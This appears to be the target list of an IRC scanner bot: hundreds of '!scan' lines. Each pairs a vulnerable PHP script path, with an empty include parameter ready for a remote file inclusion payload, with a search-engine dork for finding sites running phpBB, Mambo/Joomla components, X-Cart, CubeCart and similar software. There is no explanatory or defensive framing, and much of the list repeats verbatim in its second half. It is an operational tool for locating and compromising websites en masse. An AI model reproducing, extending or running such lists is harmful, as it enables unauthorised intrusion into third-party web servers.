!scan content/article.php?ide= WM-News
!scan content/modify_go.php?pwfile= WM-News
!scan protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
!scan /inc/header.php/step_one.php?server_inc= step_one.php?sid
!scan /language/lang_english/lang_main_album.php?phpbb_root_path= "Powered by phpBB2" site:fr
!scan language/lang_english/lang_main_album.php?phpbb_admin_path= phpBB
!scan phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath= Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan lib/base.php?BaseCfg[BaseDir]= actSite
!scan index.php?themesdir= "Segue v."+"Middlebury College"
!scan /includes/openid/Auth/OpenID/BBStore.php?openid_root_path= "phpBB"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mx_glance"
!scan contrib/mx_glance_sdesc.php?mx_root_path= "mxBB"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= "amember"
!scan news/newstopic_inc.php?indir= "Public Media Manager"
!scan phfito/phfito-post?SRC_PATH= "phpFidoNode"
!scan /protection.php?action=logout&siteurl= "/members.php?id=all"
!scan /appserv/main.php?appserv_root= "The AppServ Open Project"
!scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
!scan admin/include/header.php?repertoire= "chupix cms"
!scan forum/forum.php?view= "lustig.cms"
!scan access/login.php?path_to_root= "FrontAccounting"
!scan includes/lang/language.php?path_to_root= "FrontAccounting"
!scan dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth= "DFD Cart"
!scan dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth= "DFD Cart"
!scan show.php?file= "Helplink"
!scan data/compatible.php?module_name= "Nuke Mobile Entartainment"
!scan config.inc.php?_path= "WordSmith"
!scan modules/search/search.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage= "iziContents"
!scan modules/links/submit_links.php?rootdp=zZz&gsLanguage= "iziContents"
!scan modifyform.html?code= modifyform
!scan Encoder.php?base_dir= phpsyncml
!scan Decoder.php?base_dir= phpsyncml
!scan administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= "com_joom12pic"
!scan phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT= "phpFFL"
!scan afb-3-beta-2007-08-28/_includes/settings.inc.php?approot= "Ajax File Browser"
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= "com_joomlaradiov5"
!scan config.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan smarty.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan customer/product.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan provider/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan admin/auth.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
!scan NuclearBB/tasks/send_queued_emails.php?root_path= NuclearBB
!scan protection.php?action=logout&siteurl= "Site Layout & Graphics"
!scan protection.php?action=logout&siteurl= statcounter
!scan protection.php?action=logout&siteurl= "PHPFanBase"
!scan manager/admin/index.php?MGR= "phpRealty"
!scan manager/admin/p_ins.php?MGR= "phpRealty"
!scan manager/admin/u_ins.php?MGR= "phpRealty"
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/view.php?Codebase= ED Engine
!scan source/mod/rss/post.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan joomla/index.php?option=com_restaurante&task= "/index.php?option=com_restaurante"
!scan modules/addons/plugin.php?doc_root= "txx cms"
!scan modules/addons/plugin.php?doc_root= addons
!scan modules/Discipline/CategoryBreakdownTime.php?FocusPath= Discipline
!scan modules/Discipline/CategoryBreakdownTime.php?staticpath= Discipline
!scan modules/Discipline/StudentFieldBreakdown.php?staticpath= Discipline
!scan lib/functions.php?DOC_ROOT= "Online Fantasy Football League"
!scan lib/header.php?DOC_ROOT= "Online Fantasy Football League"
!scan menu.php?functions_file= phpMytourney
!scan environment.php?DIR_PREFIX= AnyInventory
!scan dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH= Phpof
!scan stphpapplication.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan senetman/html/index.php?page= eNetman
!scan es_desp.php?files_dir= Weblogicnet
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan es_offer.php?files_dir= Weblogicnet
!scan stphpbtnimage.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpform.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpapplication.php?STPHPLIB_DIR= "stph"
!scan stphpbtnimage.php?STPHPLIB_DIR= "stph"
!scan stphpform.php?STPHPLIB_DIR= "stph"
!scan senetman/html/index.php?page= "senetman"
!scan /intern/admin/other/backup.php?admin=1&rootdir= "phpBG"
!scan /intern/admin/?rootdir= "phpBG"
!scan /intern/clan/member_add.php?rootdir= "phpBG"
!scan /intern/config/key_2.php?rootdir= "phpBG"
!scan /intern/config/forum.php?rootdir= "phpBG"
!scan xGB.php?act=admin&do= "xGb.php"
!scan modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= "mvcw_conver.php"
!scan convert/mvcw.php?vwar_root= "convert/mvcw.php"
!scan convert/mvcw.php?step=1&vwar_root= "convert/mvcw.php"
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= activecontent.php
!scan public_includes/pub_blocks/activecontent.php?vsDragonRootPath= "Php Blue Dragon"
!scan ncaster/admin/addons/archive/archive.php?adminfolder= ncaster
!scan ncaster/admin/addons/archive/archive.php?adminfolder= Ncaster 1.7.2
!scan /chat/inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:.ru
!scan database.php?mosConfig_absolute_path= "powered by mambo"
!scan config.php?path_to_root= "path_to_root"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan admin/inc/change_action.php?format_menue= "PHPNews Version 0.93"
!scan order/login.php?svr_rootscript= "order?page=plan_show"
!scan /include.php?path[docroot]= "newspublish"
!scan newsletter/newsletter.php?waroot= newsletter.php?
!scan mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= mediagallery/
!scan beacon/language/1/splash.lang.php?languagePath= /beacon/
!scan common/func.php?CommonAbsDir= func.php?
!scan /surveys/survey.inc.php?path= surveys
!scan index.php?body= "index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= "mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms" site:.org
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= "com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
!scan /main.php?sayfa= "main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
!scan /login.php?dir= login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan index.php?pageurl= "index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= "fusion news management system"
!scan index.php?var= "index.php?var=*.php"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?go= "index.php?go="
!scan index.php?site= "index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= ".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?id= "index.php?id=*.php"
!scan index1.php?= "index1.php?=*.php?
!scan index.php?site= "index.php?site=*.php"
!scan main.php?id= "main.php?id=*.php"
!scan content.php?page= "content.php?page=*.php"
!scan admin.php?page= "admin.php?page=*.php"
!scan lib/gore.php?libpath= "/SQuery/"
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan index2.php?p= "index2.php?p=*.php"
!scan index1.php?go= "index1.php?go=*.php"
!scan news_detail.php?file= "news_detail.php?file=*.php"
!scan old_reports.php?file= "old_reports.php?file=*.php"
!scan index.php?x= "index.php?x=*.php"
!scan index.php?nic= "index.php?nic=*.php"
!scan homepage.php?sel= "homepage.php?sel=*.php"
!scan index.php?sel= "index.php?sel=*.php"
!scan main.php?x= "main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "com_artlinks"
!scan index2.php?x= index2.php?x=*.php"
!scan main.php?pagina= "main.php?pagina=*.php"
!scan test.php?page= test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= akocomments.php
!scan index.php?page= "edu/index.php?page=*.php"
!scan *.php?page= *.php?page=*.php"
!scan index.php?oldal= "index.php?oldal=*.php"
!scan index.php?lang=gr&file "index.php?lang=gr&file=*.php"
!scan index.php?pag= "index.php?pag=*.php"
!scan index.php?incl= "index.php?incl="
!scan avatar.php?page= "avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= "edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /xgallery/
!scan index.php?x= "com/index.php?x=*.php"
!scan index.php?mode= "com/index.php?mode=*.php"
!scan index.php?stranica= "index.php?stranica="
!scan index.php?sub= "il/index.php?sub=*.php"
!scan index.php?id= "/index.php?id=*.php"
!scan index.php?t= "/index.php?t=*.php"
!scan index.php?r= "index.php?r=*.php"
!scan index.php?menu= "net/index.php?menu=*.php"
!scan index.php?pag= "com/index.php?pag=*.php"
!scan solpot.html?body= "solpot.html?body"
!scan port.php?content= port.php?content=*.php"
!scan index0.php?show= index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= day.php?date= /day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan content.php?page= "*content.php?page=*.php"
!scan index.php?topic= "/index.php?topic=*.php"
!scan index.php?u= "/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= "com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= ".tr./components"
!scan modules/My_eGallery/index.php?basepath= "My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= "vwar"
!scan index.php?loc= .br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= "us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= "com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan myevent.php?myevent_path= myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= "com_uhp"
!scan myevent.php?myevent_path= "uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" "uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "us/index.php?option=com_remository
!scan show.php?path= fclick
!scan show.php?path= .ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= ".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= "com_a6mambocredits"
!scan index.php?template= "index.php?"
!scan search.php?cutepath= "search.php?"
!scan show_news.php?cutepath= "show_news.php?"
!scan page.php?doc= "page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= "com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= ".de.*/com_mgm"
!scan help.php?css_path= phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= "com_galleria/"
!scan big.php?pathtotemplate= ".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= ".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= ".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= ".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= /squirrelcart/
!scan index2.php?to= "/index2.php?to=*.php"
!scan index.php?load= "/index.php?load=*.php"
!scan home.php?pagina= "home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= modules.php?name=4nAlbum
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= /agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= **/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= **/spid.php **/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= *br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" *gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= "AllMyGuests"
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= "com_rsgallery"
!scan /components/com_smf/smf.php?mosConfig_absolute_path= "com_smf"
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= "com_peoplebook"
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"
!scan inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= "/com_mtree/"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan /popup_window.php?site_isp_root= "Squirrelcart"
!scan /yabbse/Sources/Packages.php?sourcedir= Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/ site:uk
!scan /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"
!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"
!scan /components/com_simpleboard/image_upload.php?sbp= "com_simpleboard"

!scan /surveys/survey.inc.php?path= surveys
!scan index.php?body= "index.php?body="
!scan /classes/adodbt/sql.php?classes_dir= adobt site:pl
!scan enc/content.php?Home_Path= "powered by doodle cart"
!scan /classified_right.php?language_dir= classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"
!scan /embed/day.php?path= intitle:"Login to Calendar"
!scan /includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan /includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /mcf.php?content= "mcf.php" site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms" site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"
!scan /zipndownload.php?PP_PATH= "Powered by: PhotoPost"
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= "com_serverstat"
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"
!scan /main.php?sayfa= "main.php?sayfa="
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= "/ubbthreads/"
!scan /header.php?abspath= "MobilePublisherPHP"
!scan components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= .com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= /TotalCalendar
!scan /login.php?dir= login.php?dir=
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan index.php?pageurl= "index.php?pageurl=*.php"
!scan /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
!scan index.php?var= "index.php?var=*.php"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?go= "index.php?go="
!scan index.php?site= "index.php?site="
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= ".com.*/index.php?option=com_comprofiler"
!scan index.php?pagina= "index.php?pagina=*.php"
!scan index.php?id= "index.php?id=*.php"
!scan index1.php?= "index1.php?=*.php?
!scan index.php?site= "index.php?site=*.php"
!scan main.php?id= "main.php?id=*.php"
!scan content.php?page= "content.php?page=*.php"
!scan admin.php?page= "admin.php?page=*.php"
!scan lib/gore.php?libpath= "/SQuery/"
!scan SQuery/lib/gore.php?libpath= "/SQuery/"
!scan index2.php?p= "index2.php?p=*.php"
!scan index1.php?go= "index1.php?go=*.php"
!scan news_detail.php?file= "news_detail.php?file=*.php"
!scan old_reports.php?file= "old_reports.php?file=*.php"
!scan index.php?x= "index.php?x=*.php"
!scan index.php?nic= "index.php?nic=*.php"
!scan homepage.php?sel= "homepage.php?sel=*.php"
!scan index.php?sel= "index.php?sel=*.php"
!scan main.php?x= "main.php?x=*.php"
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "com_artlinks"
!scan index2.php?x= index2.php?x=*.php"
!scan main.php?pagina= "main.php?pagina=*.php"
!scan test.php?page= test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"
!scan akocomments.php?mosConfig_absolute_path= akocomments.php
!scan index.php?page= "edu/index.php?page=*.php"
!scan *.php?page= *.php?page=*.php"
!scan index.php?oldal= "index.php?oldal=*.php"
!scan index.php?lang=gr&file "index.php?lang=gr&file=*.php"
!scan index.php?pag= "index.php?pag=*.php"
!scan index.php?incl= "index.php?incl="
!scan avatar.php?page= "avatar.php?page="
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= "Mambo is"
!scan ndex.php?p= "edu/index.php?p=*.php"
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /xgallery/
!scan index.php?x= "com/index.php?x=*.php"
!scan index.php?mode= "com/index.php?mode=*.php"
!scan index.php?stranica= "index.php?stranica="
!scan index.php?sub= "il/index.php?sub=*.php"
!scan index.php?id= "/index.php?id=*.php"
!scan index.php?t= "/index.php?t=*.php"
!scan index.php?r= "index.php?r=*.php"
!scan index.php?menu= "net/index.php?menu=*.php"
!scan index.php?pag= "com/index.php?pag=*.php"
!scan solpot.html?body= "solpot.html?body"
!scan port.php?content= port.php?content=*.php"
!scan index0.php?show= index0.php?show=*.php"
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan /tools/send_reminders.php?includedir= day.php?date= /day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /index.php?option=com_comprofiler"
!scan content.php?page= "*content.php?page=*.php"
!scan index.php?topic= "/index.php?topic=*.php"
!scan index.php?u= "/index.php?u=*.php"
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= "com_linkdirectory"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= ".tr./components"
!scan modules/My_eGallery/index.php?basepath= "My_eGallery"
!scan /modules/vwar/admin/admin.php?vwar_root= "vwar"
!scan index.php?loc= .br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= "us/index.php?option=com_comprofiler"
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= "com_cropimage"
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" tags.php
!scan myevent.php?myevent_path= myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= "com_uhp"
!scan myevent.php?myevent_path= "uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:"Tagger LE" "uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "us/index.php?option=com_remository
!scan show.php?path= fclick
!scan show.php?path= .ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= ".de.*/com_linkdirectory"
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= "com_a6mambocredits"
!scan index.php?template= "index.php?"
!scan search.php?cutepath= "search.php?"
!scan show_news.php?cutepath= "show_news.php?"
!scan page.php?doc= "page.php?doc="
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= "com_webring"
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= ".de.*/com_mgm"
!scan help.php?css_path= phplive site:.uk
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= "com_galleria/"
!scan big.php?pathtotemplate= ".de.*"big.php?"
!scan includes/search.php?GlobalSettings[templatesDirectory]= ".com"search.php?"
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"
!scan /functions.php?include_path= "powered by: phpecard"
!scan modules/My_eGallery/index.php?basepath= ".de.*"My_eGallery"
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= ".net.*"com_galleria/"
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "powered by CubeCart 3.0.6"
!scan /class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3"
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"
!scan /squirrelcart/cart_content.php?cart_isp_root= /squirrelcart/
!scan index2.php?to= "/index2.php?to=*.php"
!scan index.php?load= "/index.php?load=*.php"
!scan home.php?pagina= "home.php?pagina="
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= modules.php?name=4nAlbum
!scan /include/write.php?dir= /zboard/zboard.php
!scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= "com_mtree"
!scan homepage.php?sel= "homepage.php?sel="
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= /agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= /osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= **/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= **/spid.php **/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= "powered by siteframe"
!scan al_initialize.php?alpath= "Powered by AutoLinks Pro"
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= *br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" *gov*
!scan /extensions/moblog/moblog_lib.php?basedir= "powered by pivot"
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"
